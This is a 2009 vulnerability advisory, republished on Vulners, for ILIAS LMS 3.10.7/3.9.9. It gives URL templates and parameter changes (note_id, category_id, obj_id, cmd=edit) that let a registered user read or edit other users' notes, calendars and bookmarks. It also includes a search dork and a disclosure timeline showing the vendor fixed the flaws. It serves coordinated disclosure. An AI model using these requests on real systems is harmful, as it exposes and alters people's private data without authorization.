Vulners
Lucene search
ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL **
** Ä„PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION |
|--------------------------------------------------------------------------------------------|
| | ILIAS LMS <= 3.10.7/3.9.9 | |
| CMS INFORMATION: ----------------------------------- |
| |
|-->WEB: http://www.ilias.de/ |
|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu |
|-->DEMO: http://www.demo.ilias-support.com/ |
|-->CATEGORY: LMS/Education |
|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you |
| to easily manage learning resources in an integrated system. |
|-->RELEASED: 2009-06-22 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: "powered by ILIAS" |
|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE |
|-->AFFECT VERSION: 3.10.7/3.9.9 |
|-->Discovered Bug date: 2009-06-28 |
|-->Reported Bug date: 2009-06-28 |
|-->Fixed bug date: 2009-06-30 |
|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 |
| &client_id=docu |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: YEnH4ckEr <--<3--> Marijose. |
| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^ |
----------------------------------------------------------------------------------------------
<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>
I used my own account in my university...sorry for testing :P
#################################
/////////////////////////////////
ARBITRARY INFORMATION DISCLOSURE
/////////////////////////////////
#################################
-------------------
-------------------
"POST-ITS" ISSUE:
-------------------
-------------------
When a user, teacher, admin, alumn, post a new post-its,
he could read all post-its in database.
The vuln link would be:
http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI
Changing note_id=1 for other value, for ex. 100, we could
read this posts-it.
That seems a low risk vuln but, when i tested on-line, ie,
against my university and i've got a lot of sensitive information.
-------------------
-------------------
"CMD" ISSUE:
-------------------
-------------------
Course/group/... calendars:
This would be a normal link:
http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438
But if I change cmd=frameset for cmd=edit:
http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit
I access to information about this group/course/..., and I tried to
change it, but i got permission denied...anyway, i
can get how it's configured this group/course/...
-------------------
-------------------
"CALENDAR" ISSUE:
-------------------
-------------------
http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI
Changing category_id, it shows sensitive information about
any course/group/...
Personal and global calendars are secure.
#########################################
/////////////////////////////////////////
ARBITRARY INFORMATION DISCLOSURE/EDITION
/////////////////////////////////////////
#########################################
This module (favorite) allows to get a repository of favorite links
-------------------
-------------------
"FAVORITE" ISSUE:
-------------------
-------------------
This would be the vuln link:
http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI
GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link.
User (victim) trusts in these links (He posts them)
############
////////////
VIDEOS DEMO
////////////
############
ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358
ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E
####################
////////////////////
DISCLOSURE TIMELINE
////////////////////
####################
**2009-06-28** ~~~~~> FIRST VULNS DISCOVERED
**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR
**2009-06-29** ~~~~~> OTHER SECURITY ISSUE DISCOVERED
**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT
**2009-06-30** ~~~~~> VENDOR RESPONSED
**2009-06-30** ~~~~~> VENDOR CONFIRMED SECURITY ISSUES
**2009-06-30** ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED)
**2009-06-30** ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release"
**2009-07-01** ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES
**2009-07-01** ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE
**2009-07-08** ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE (3.10.8 / 3.9.10)
**2009-07-11** ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...)
**2009-07-12** ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS
**2009-07-15** ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY.
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
##############################################################################
##############################################################################
##**************************************************************************##
## SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST! ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################
# milw0rm.com [2009-07-15]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2009 00:00Current
7.4High risk
Vulners AI Score7.4